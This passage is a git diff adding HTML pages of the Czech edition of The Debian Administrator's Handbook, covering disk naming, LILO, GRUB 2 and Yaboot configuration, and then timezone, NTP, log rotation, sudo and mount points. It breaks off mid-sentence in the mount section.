+                class="emphasis"><em>udev</em></span> to create and delete them as needed when the corresponding devices appear and disappear. For this reason, <code
+                class="filename">/dev/</code> doesn't need to be persistent and is thus a RAM-based filesystem that starts empty and contains only the relevant entries.
+			</div><div
+              class="para">
+				The kernel communicates lots of information about any newly added device and hands out a pair of major/minor numbers to identify it. With this <code
+                class="command">udevd</code> can create the special file under the name and with the permissions that it wants. It can also create aliases and perform additional actions (such as initialization or registration tasks). <code
+                class="command">udevd</code>'s behavior is driven by a large set of (customizable) rules.
+			</div><div
+              class="para">
+				With dynamically assigned names, you can thus keep the same name for a given device, regardless of the connector used or the connection order, which is especially useful when you use various USB peripherals. The first partition on the first hard drive can then be called <code
+                class="filename">/dev/sda1</code> for backwards compatibility, or <code
+                class="filename">/dev/root-partition</code> if you prefer, or even both at the same time since <code
+                class="command">udevd</code> can be configured to automatically create a symbolic link.
+			</div><div
+              class="para">
+				In ancient times, some kernel modules did automatically load when you tried to access the corresponding device file. This is no longer the case, and the peripheral's special file no longer exists prior to loading the module; this is no big deal, since most modules are loaded on boot thanks to automatic hardware detection. But for undetectable peripherals (such as very old disk drives or PS/2 mice), this doesn't work. Consider adding the modules, <code
+                class="literal">floppy</code>, <code
+                class="literal">psmouse</code> and <code
+                class="literal">mousedev</code> to <code
+                class="filename">/etc/modules</code> in order to force loading them on boot.
+			</div></div><a
+            id="id-1.11.12.6.3"
+            class="indexterm"></a><a
+            id="id-1.11.12.6.4"
+            class="indexterm"></a><div
+            class="para">
+				Configuration of the bootloader must identify the different hard drives and their partitions. Linux uses “block” special files stored in the <code
+              class="filename">/dev/</code> directory, for this purpose. Since Debian <span
+              class="distribution distribution">Squeeze</span>, the naming scheme for hard drives has been unified by the Linux kernel, and all hard drives (IDE/PATA, SATA, SCSI, USB, IEEE 1394) are now represented by <code
+              class="filename">/dev/sd*</code>.
+			</div><div
+            class="para">
+				Each partition is represented by its number on the disk on which it resides: for instance, <code
+              class="filename">/dev/sda1</code> is the first partition on the first disk, and <code
+              class="filename">/dev/sdb3</code> is the third partition on the second disk.
+			</div><a
+            id="id-1.11.12.6.7"
+            class="indexterm"></a><a
+            id="id-1.11.12.6.8"
+            class="indexterm"></a><a
+            id="id-1.11.12.6.9"
+            class="indexterm"></a><a
+            id="id-1.11.12.6.10"
+            class="indexterm"></a><div
+            class="para">
+				The PC architecture (or “i386”, including its younger cousin “amd64”) has long been limited to using the “MS-DOS” partition table format, which only allows four “primary” partitions per disk. To go beyond this limitation under this scheme, one of them has to be created as an “extended” partition, and it can then contain additional “secondary” partitions. These secondary partitions are numbered from 5. Thus the first secondary partition could be <code
+              class="filename">/dev/sda5</code>, followed by <code
+              class="filename">/dev/sda6</code>, etc.
+			</div><div
+            class="para">
+				Another restriction of the MS-DOS partition table format is that it only allows disks up to 2 TiB in size, which is becoming a real problem with recent disks.
+			</div><a
+            id="id-1.11.12.6.13"
+            class="indexterm"></a><a
+            id="id-1.11.12.6.14"
+            class="indexterm"></a><div
+            class="para">
+				A new partition table format called GPT loosens these constraints on the number of partitions (it allows up to 128 partitions when using standard settings) and on the size of the disks (up to 8 ZiB, which is more than 8 billion terabytes). If you intend to create many physical partitions on the same disk, you should therefore ensure that you are creating the partition table in the GPT format when partitioning your disk.
+			</div><div
+            class="para">
+				It is not always easy to remember what disk is connected to which SATA controller, or in third position in the SCSI chain, especially since the naming of hotplugged hard drives (which includes among others most SATA disks and external disks) can change from one boot to another. Fortunately, <code
+              class="command">udev</code> creates, in addition to <code
+              class="filename">/dev/sd*</code>, symbolic links with a fixed name, which you could then use if you wished to identify a hard drive in a non-ambiguous manner. These symbolic links are stored in <code
+              class="filename">/dev/disk/by-id</code>. On a machine with two physical disks, for example, one could find the following:
+			</div><pre
+            class="screen"><code
+              class="computeroutput">mirexpress:/dev/disk/by-id# </code><strong
+              class="userinput"><code>ls -l
+</code></strong><code
+              class="computeroutput">total 0
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP -&gt; ../../sda
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP-part1 -&gt; ../../sda1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP-part2 -&gt; ../../sda2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697 -&gt; ../../sdb
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697-part1 -&gt; ../../sdb1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697-part2 -&gt; ../../sdb2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP -&gt; ../../sda
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP-part1 -&gt; ../../sda1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP-part2 -&gt; ../../sda2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697 -&gt; ../../sdb
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697-part1 -&gt; ../../sdb1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697-part2 -&gt; ../../sdb2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0 -&gt; ../../sdc
+lrwxrwxrwx 1 root root 10 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0-part1 -&gt; ../../sdc1
+lrwxrwxrwx 1 root root 10 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0-part2 -&gt; ../../sdc2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 wwn-0x5000c50015c4842f -&gt; ../../sda
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 wwn-0x5000c50015c4842f-part1 -&gt; ../../sda1
+[...]
+mirexpress:/dev/disk/by-id# </code></pre><div
+            class="para">
+				Note that some disks are listed several times (because they behave simultaneously as ATA disks and SCSI disks), but the relevant information is mainly in the model and serial numbers of the disks, from which you can find the peripheral file.
+			</div><div
+            class="para">
+				The example configuration files given in the following sections are based on the same setup: a single SATA disk, where the first partition is an old Windows installation and the second contains Debian GNU/Linux.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.config-lilo"></a>8.8.2. Configuring LILO</h3></div></div></div><a
+            id="id-1.11.12.7.2"
+            class="indexterm"></a><a
+            id="id-1.11.12.7.3"
+            class="indexterm"></a><div
+            class="para">
+				<span
+              class="emphasis"><em>LILO</em></span> (LInux LOader) is the oldest bootloader — solid but rustic. It writes the physical address of the kernel to boot on the MBR, which is why each update to LILO (or its configuration file) must be followed by the command <code
+              class="command">lilo</code>. Forgetting to do so will render a system unable to boot if the old kernel was removed or replaced as the new one will not be in the same location on the disk.
+			</div><div
+            class="para">
+				LILO's configuration file is <code
+              class="filename">/etc/lilo.conf</code>; a simple file for standard configuration is illustrated in the example below.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.lilo.conf"></a><p
+              class="title"><strong>Příklad 8.4. LILO configuration file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+# The disk on which LILO should be installed.
+# By indicating the disk and not a partition.
+# you order LILO to be installed on the MBR.
+boot=/dev/sda
+# the partition that contains Debian
+root=/dev/sda2
+# the item to be loaded by default
+default=Linux
+
+# the most recent kernel image
+image=/vmlinuz
+  label=Linux
+  initrd=/initrd.img
+  read-only
+
+# Old kernel (if the newly installed kernel doesn't boot)
+image=/vmlinuz.old
+  label=LinuxOLD
+  initrd=/initrd.img.old
+  read-only
+  optional
+
+# only for Linux/Windows dual boot
+other=/dev/sda1
+  label=Windows
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.config-grub"></a>8.8.3. GRUB 2 Configuration</h3></div></div></div><a
+            id="id-1.11.12.8.2"
+            class="indexterm"></a><a
+            id="id-1.11.12.8.3"
+            class="indexterm"></a><div
+            class="para">
+				<span
+              class="emphasis"><em>GRUB</em></span> (GRand Unified Bootloader) is more recent. It is not necessary to invoke it after each update of the kernel; <span
+              class="emphasis"><em>GRUB</em></span> knows how to read the filesystems and find the position of the kernel on the disk by itself. To install it on the MBR of the first disk, simply type <code
+              class="command">grub-install /dev/sda</code>. <a
+              id="id-1.11.12.8.4.4"
+              class="indexterm"></a>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Disk names for GRUB</strong></p></div></div></div><div
+              class="para">
+				GRUB can only identify hard drives based on information provided by the BIOS. <code
+                class="literal">(hd0)</code> corresponds to the first disk thus detected, <code
+                class="literal">(hd1)</code> the second, etc. In most cases, this order corresponds exactly to the usual order of disks under Linux, but problems can occur when you associate SCSI and IDE disks. GRUB stores correspondences that it detects in the file <code
+                class="filename">/boot/grub/device.map</code>. If you find errors there (because you know that your BIOS detects drives in a different order), correct them manually and run <code
+                class="command">grub-install</code> again. <code
+                class="command">grub-mkdevicemap</code> can help creating a <code
+                class="filename">device.map</code> file from which to start.
+			</div><div
+              class="para">
+				Partitions also have a specific name in GRUB. When you use “classical” partitions in MS-DOS format, the first partition on the first disk is labeled, <code
+                class="literal">(hd0,msdos1)</code>, the second <code
+                class="literal">(hd0,msdos2)</code>, etc.
+			</div></div><div
+            class="para">
+				GRUB 2 configuration is stored in <code
+              class="filename">/boot/grub/grub.cfg</code>, but this file (in Debian) is generated from others. Be careful not to modify it by hand, since such local modifications will be lost the next time <code
+              class="command">update-grub</code> is run (which may occur upon update of various packages). The most common modifications of the <code
+              class="filename">/boot/grub/grub.cfg</code> file (to add command line parameters to the kernel or change the duration that the menu is displayed, for example) are made through the variables in <code
+              class="filename">/etc/default/grub</code>. To add entries to the menu, you can either create a <code
+              class="filename">/boot/grub/custom.cfg</code> file or modify the <code
+              class="filename">/etc/grub.d/40_custom</code> file. For more complex configurations, you can modify other files in <code
+              class="filename">/etc/grub.d</code>, or add to them; these scripts should return configuration snippets, possibly by making use of external programs. These scripts are the ones that will update the list of kernels to boot: <code
+              class="filename">10_linux</code> takes into consideration the installed Linux kernels; <code
+              class="filename">20_linux_xen</code> takes into account Xen virtual systems, and <code
+              class="filename">30_os-prober</code> lists other operating systems (Windows, OS X, Hurd).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.config-yaboot"></a>8.8.4. For Macintosh Computers (PowerPC): Configuring Yaboot</h3></div></div></div><a
+            id="id-1.11.12.9.2"
+            class="indexterm"></a><div
+            class="para">
+				Yaboot is the bootloader used by old Macintosh computers using PowerPC processors. They do not boot like PCs, but rely on a “bootstrap” partition, from which the BIOS (or OpenFirmware) executes the loader, and on which the <code
+              class="command">ybin</code> program installs <code
+              class="command">yaboot</code> and its configuration file. You will only need to run this command again if the <code
+              class="filename">/etc/yaboot.conf</code> is modified (it is duplicated on the bootstrap partition, and <code
+              class="command">yaboot</code> knows how to find the position of the kernels on the disks).
+			</div><div
+            class="para">
+				Before executing <code
+              class="command">ybin</code>, you must first have a valid <code
+              class="filename">/etc/yaboot.conf</code>. The following is an example of a minimal configuration. <a
+              id="id-1.11.12.9.4.3"
+              class="indexterm"></a>
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.yaboot.conf"></a><p
+              class="title"><strong>Příklad 8.5. Yaboot configuration file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+# bootstrap partition
+boot=/dev/sda2
+# the disk
+device=hd:
+# the Linux partition
+partition=3
+root=/dev/sda3
+# boot after 3 seconds of inactivity
+# (timeout is in tenths of seconds)
+timeout=30
+
+install=/usr/lib/yaboot/yaboot
+magicboot=/usr/lib/yaboot/ofboot
+enablecdboot
+
+# last kernel installed
+image=/vmlinux
+        label=linux
+        initrd=/initrd.img
+        read-only
+
+# old kernel
+image=/vmlinux.old
+        label=old
+        initrd=/initrd.img.old
+        read-only
+
+# only for Linux/Mac OSX dual-boot
+macosx=/dev/sda5
+
+# bsd=/dev/sdaX and macos=/dev/sdaX
+# are also possible
+</pre></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-printing.html"><strong>Předcházející</strong>8.7. Printer Configuration</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.config-misc.html"><strong>Další</strong>8.9. Other Configurations: Time Synchronization, ...</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.config-misc.html b/tmp/cs-CZ/html/sect.config-misc.html
new file mode 100644
index 000000000..05b8e5e24
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.config-misc.html
@@ -0,0 +1,558 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.config-bootloader.html"
+        title="8.8. Configuring the Bootloader" /><link
+        rel="next"
+        href="sect.kernel-compilation.html"
+        title="8.10. Compiling a Kernel" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.config-misc.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-bootloader.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-compilation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.config-misc"></a>8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…</h2></div></div></div><div
+          class="para">
+			The many elements listed in this section are good to know for anyone who wants to master all aspects of configuration of the GNU/Linux system. They are, however, treated briefly and frequently refer to the documentation.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.timezone"></a>8.9.1. Timezone</h3></div></div></div><a
+            id="id-1.11.13.3.2"
+            class="indexterm"></a><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.symbolic-link"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Symbolic links</strong></p></div></div></div><a
+              id="id-1.11.13.3.3.2"
+              class="indexterm"></a><a
+              id="id-1.11.13.3.3.3"
+              class="indexterm"></a><a
+              id="id-1.11.13.3.3.4"
+              class="indexterm"></a><div
+              class="para">
+				A symbolic link is a pointer to another file. When you access it, the file to which it points is opened. Removal of the link will not cause deletion of the file to which it points. Likewise, it does not have its own set of permissions, but rather retains the permissions of its target. Finally, it can point to any type of file: directories, special files (sockets, named pipes, device files, etc.), even other symbolic links.
+			</div><div
+              class="para">
+				The <code
+                class="command">ln -s <em
+                  class="replaceable">target</em> <em
+                  class="replaceable">link-name</em></code> command creates a symbolic link, named <em
+                class="replaceable">link-name</em>, pointing to <em
+                class="replaceable">target</em>.
+			</div><div
+              class="para">
+				If the target does not exist, then the link is “broken” and accessing it will result in an error indicating that the target file does not exist. If the link points to another link, you will have a “chain” of links that turns into a “cycle” if one of the targets points to one of its predecessors. In this case, accessing one of the links in the cycle will result in a specific error (“too many levels of symbolic links”); this means the kernel gave up after several rounds of the cycle.
+			</div></div><div
+            class="para">
+				The timezone, configured during initial installation, is a configuration item for the <span
+              class="pkg pkg">tzdata</span> package. To modify it, use the <code
+              class="command">dpkg-reconfigure tzdata</code> command, which allows you to choose the timezone to be used in an interactive manner. Its configuration is stored in the <code
+              class="filename">/etc/timezone</code> file. Additionally, the corresponding file in the <code
+              class="filename">/usr/share/zoneinfo</code> directory is copied into <code
+              class="filename">/etc/localtime</code>; this file contains the rules governing the dates where daylight saving time is active, for countries that use it.
+			</div><a
+            id="id-1.11.13.3.5"
+            class="indexterm"></a><a
+            id="id-1.11.13.3.6"
+            class="indexterm"></a><a
+            id="id-1.11.13.3.7"
+            class="indexterm"></a><a
+            id="id-1.11.13.3.8"
+            class="indexterm"></a><a
+            id="id-1.11.13.3.9"
+            class="indexterm"></a><a
+            id="id-1.11.13.3.10"
+            class="indexterm"></a><div
+            class="para">
+				When you need to temporarily change the timezone, use the <code
+              class="varname">TZ</code> environment variable, which takes priority over the configured system default:
+			</div><a
+            id="id-1.11.13.3.12"
+            class="indexterm"></a><a
+            xmlns=""
+            id="screen.tz"></a><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>date</code></strong>
+<code
+              class="computeroutput">Thu Feb 19 11:25:18 CET 2015</code>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>TZ="Pacific/Honolulu" date</code></strong>
+<code
+              class="computeroutput">Thu Feb 19 00:25:21 HST 2015</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> System clock, hardware clock</strong></p></div></div></div><div
+              class="para">
+				There are two time sources in a computer. A computer's motherboard has a hardware clock, called the “CMOS clock”. This clock is not very precise, and provides rather slow access times. The operating system kernel has its own, the software clock, which it keeps up to date with its own means (possibly with the help of time servers, see <a
+                class="xref"
+                href="sect.config-misc.html#sect.time-synchronization">8.9.2 – „Time Synchronization“</a>). This system clock is generally more accurate, especially since it doesn't need access to hardware variables. However, since it only exists in live memory, it is zeroed out every time the machine is booted, contrary to the CMOS clock, which has a battery and therefore “survives” rebooting or halting of the machine. The system clock is, thus, set from the CMOS clock during boot, and the CMOS clock is updated on shutdown (to take into account possible changes or corrections if it has been improperly adjusted).
+			</div><div
+              class="para">
+				In practice, there is a problem, since the CMOS clock is nothing more than a counter and contains no information regarding the time zone. There is a choice to make regarding its interpretation: either the system considers it runs in universal time (UTC, formerly GMT), or in local time. This choice could be a simple shift, but things are actually more complicated: as a result of daylight saving time, this offset is not constant. The result is that the system has no way to determine whether the offset is correct, especially around periods of time change. Since it is always possible to reconstruct local time from universal time and the timezone information, we strongly recommend using the CMOS clock in universal time.
+			</div><div
+              class="para">
+				Unfortunately, Windows systems in their default configuration ignore this recommendation; they keep the CMOS clock on local time, applying time changes when booting the computer by trying to guess during time changes if the change has already been applied or not. This works relatively well, as long as the system has only Windows running on it. But when a computer has several systems (whether it be a “dual-boot” configuration or running other systems via virtual machine), chaos ensues, with no means to determine if the time is correct. If you absolutely must retain Windows on a computer, you should either configure it to keep the CMOS clock as UTC (setting the registry key <code
+                class="literal">HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation\RealTimeIsUniversal</code> to “1” as a DWORD), or use <code
+                class="command">hwclock --localtime --set</code> on the Debian system to set the hardware clock and mark it as tracking the local time (and make sure to manually check your clock in spring and autumn).
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.time-synchronization"></a>8.9.2. Time Synchronization</h3></div></div></div><a
+            id="id-1.11.13.4.2"
+            class="indexterm"></a><a
+            id="id-1.11.13.4.3"
+            class="indexterm"></a><div
+            class="para">
+				Time synchronization, which may seem superfluous on a computer, is very important on a network. Since users do not have permissions allowing them to modify the date and time, it is important for this information to be precise to prevent confusion. Furthermore, having all of the computers on a network synchronized allows better cross-referencing of information from logs on different machines. Thus, in the event of an attack, it is easier to reconstruct the chronological sequence of actions on the various machines involved in the compromise. Data collected on several machines for statistical purposes won't make a great deal of sense if they are not synchronized.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> NTP</strong></p></div></div></div><a
+              id="id-1.11.13.4.5.2"
+              class="indexterm"></a><a
+              id="id-1.11.13.4.5.3"
+              class="indexterm"></a><div
+              class="para">
+				NTP (Network Time Protocol) allows a machine to synchronize with others fairly accurately, taking into consideration the delays induced by the transfer of information over the network and other possible offsets.
+			</div><div
+              class="para">
+				While there are numerous NTP servers on the Internet, the more popular ones may be overloaded. This is why we recommend using the <span
+                class="emphasis"><em>pool.ntp.org</em></span> NTP server, which is, in reality, a group of machines that have agreed to serve as public NTP servers. You could even limit use to a sub-group specific to a country, with, for example, <span
+                class="emphasis"><em>us.pool.ntp.org</em></span> for the United States, or <span
+                class="emphasis"><em>ca.pool.ntp.org</em></span> for Canada, etc.
+			</div><div
+              class="para">
+				However, if you manage a large network, it is recommended that you install your own NTP server, which will synchronize with the public servers. In this case, all the other machines on your network can use your internal NTP server instead of increasing the load on the public servers. You will also increase homogeneity with your clocks, since all the machines will be synchronized on the same source, and this source is very close in terms of network transfer times.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.ntp-on-workstations"></a>8.9.2.1. For Workstations</h4></div></div></div><div
+              class="para">
+					Since work stations are regularly rebooted (even if only to save energy), synchronizing them by NTP at boot is enough. To do so, simply install the <span
+                class="pkg pkg">ntpdate</span> package. You can change the NTP server used if needed by modifying the <code
+                class="filename">/etc/default/ntpdate</code> file.
+				</div><a
+              id="id-1.11.13.4.6.3"
+              class="indexterm"></a><a
+              id="id-1.11.13.4.6.4"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.ntp-on-servers"></a>8.9.2.2. For Servers</h4></div></div></div><div
+              class="para">
+					Servers are only rarely rebooted, and it is very important for their system time to be correct. To permanently maintain correct time, you would install a local NTP server, a service offered in the <span
+                class="pkg pkg">ntp</span> package. In its default configuration, the server will synchronize with <span
+                class="emphasis"><em>pool.ntp.org</em></span> and provide time in response to requests coming from the local network. You can configure it by editing the <code
+                class="filename">/etc/ntp.conf</code> file, the most significant alteration being the NTP server to which it refers. If the network has a lot of servers, it may be interesting to have one local time server which synchronizes with the public servers and is used as a time source by the other servers of the network.
+				</div><a
+              id="id-1.11.13.4.7.3"
+              class="indexterm"></a><a
+              id="id-1.11.13.4.7.4"
+              class="indexterm"></a><a
+              id="id-1.11.13.4.7.5"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> GPS modules and other time sources</strong></p></div></div></div><a
+                id="id-1.11.13.4.7.6.2"
+                class="indexterm"></a><a
+                id="id-1.11.13.4.7.6.3"
+                class="indexterm"></a><div
+                class="para">
+					If time synchronization is particularly crucial to your network, it is possible to equip a server with a GPS module (which will use the time from GPS satellites) or a DCF-77 module (which will sync time with the atomic clock near Frankfurt, Germany). In this case, the configuration of the NTP server is a little more complicated, and prior consultation of the documentation is an absolute necessity.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.rotation-logs"></a>8.9.3. Rotating Log Files</h3></div></div></div><a
+            id="id-1.11.13.5.2"
+            class="indexterm"></a><a
+            id="id-1.11.13.5.3"
+            class="indexterm"></a><a
+            id="id-1.11.13.5.4"
+            class="indexterm"></a><a
+            id="id-1.11.13.5.5"
+            class="indexterm"></a><div
+            class="para">
+				Log files can grow, fast, and it is necessary to archive them. The most common scheme is a rotating archive: the log file is regularly archived, and only the latest <em
+              class="replaceable">X</em> archives are retained. <code
+              class="command">logrotate</code>, the program responsible for these rotations, follows directives given in the <code
+              class="filename">/etc/logrotate.conf</code> file and all of the files in the <code
+              class="filename">/etc/logrotate.d/</code> directory. The administrator may modify these files, if they wish to adapt the log rotation policy defined by Debian. The <span
+              class="citerefentry"><span
+                class="refentrytitle">logrotate</span>(1)</span> man page describes all of the options available in these configuration files. You may want to increase the number of files retained in log rotation, or move the log files to a specific directory dedicated to archiving them rather than delete them. You could also send them by e-mail to archive them elsewhere.
+			</div><div
+            class="para">
+				The <code
+              class="command">logrotate</code> program is executed daily by the <code
+              class="command">cron</code> scheduling program (described in <a
+              class="xref"
+              href="sect.task-scheduling-cron-atd.html">9.7 – „Scheduling Tasks with <code
+                class="command">cron</code> and <code
+                class="command">atd</code>“</a>).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.sharing-admin-rights"></a>8.9.4. Sharing Administrator Rights</h3></div></div></div><a
+            id="id-1.11.13.6.2"
+            class="indexterm"></a><a
+            id="id-1.11.13.6.3"
+            class="indexterm"></a><a
+            id="id-1.11.13.6.4"
+            class="indexterm"></a><div
+            class="para">
+				Frequently, several administrators work on the same network. Sharing the root passwords is not very elegant, and opens the door for abuse due to the anonymity such sharing creates. The solution to this problem is the <code
+              class="command">sudo</code> program, which allows certain users to execute certain commands with special rights. In the most common use case, <code
+              class="command">sudo</code> allows a trusted user to execute any command as root. To do so, the user simply executes <code
+              class="command">sudo <em
+                class="replaceable">command</em></code> and authenticates using their personal password.
+			</div><div
+            class="para">
+				When installed, the <span
+              class="pkg pkg">sudo</span> package gives full root rights to members of the <code
+              class="literal">sudo</code> Unix group. To delegate other rights, the administrator must use the <code
+              class="command">visudo</code> command, which allows them to modify the <code
+              class="filename">/etc/sudoers</code> configuration file (here again, this will invoke the <code
+              class="command">vi</code> editor, or any other editor indicated in the <code
+              class="varname">EDITOR</code> environment variable). Adding a line with <code
+              class="literal"><em
+                class="replaceable">username</em> ALL=(ALL) ALL</code> allows the user in question to execute any command as root.
+			</div><a
+            id="id-1.11.13.6.7"
+            class="indexterm"></a><a
+            id="id-1.11.13.6.8"
+            class="indexterm"></a><a
+            id="id-1.11.13.6.9"
+            class="indexterm"></a><div
+            class="para">
+				More sophisticated configurations allow authorization of only specific commands to specific users. All the details of the various possibilities are given in the <span
+              class="citerefentry"><span
+                class="refentrytitle">sudoers</span>(5)</span> man page.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.fstab-mount-points"></a>8.9.5. List of Mount Points</h3></div></div></div><a
+            id="id-1.11.13.7.2"
+            class="indexterm"></a><a
+            id="id-1.11.13.7.3"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Mounting and unmounting</strong></p></div></div></div><div
+              class="para">
+				In a Unix-like system such as Debian, files are organized in a single tree-like hierarchy of directories. The <code
+                class="filename">/</code> directory is called the “root directory”; all additional directories are sub-directories within this root. “Mounting” is the action of including the content of a peripheral device (often a hard drive) into the system's general file tree. As a consequence, if you use a separate hard drive to store users' personal data, this disk will have to be “mounted” in the <code
+                class="filename">/home/</code> directory. The root filesystem is always mounted at boot by the kernel; other devices are often mounted later during the startup sequence or manually with the <code
+                class="command">mount</code> command.
+			</div><a
+              id="id-1.11.13.7.4.3"
+              class="indexterm"></a><div
+              class="para">
+				Some removable devices are automatically mounted when connected, especially when using the GNOME, Plasma or other graphical desktop environments. Others have to be mounted manually by the user. Likewise, they must be unmounted (removed from the file tree). Normal users do not usually have permission to execute the <code
+                class="command">mount</code> and <code
+                class="command">umount</code> commands. The administrator can, however, authorize these operations (independently for each mount point) by including the <code
+                class="literal">user</code> option in the <code
+                class="filename">/etc/fstab</code> file.
+			</div><div
+              class="para">
+				The <code
+                class="command">mount</code> command can be used without arguments (it then lists all mounted filesystems). The following parameters are required to mount or unmount a device. For the complete list, please refer to the corresponding man pages, <span
+                class="citerefentry"><span
+                  class="refentrytitle">mount</span>(8)</span> and <span
+                class="citerefentry"><span
+                  class="refentrytitle">umount</span>(8)</span>. For simple cases, the syntax is simple too: for example, to mount the <code
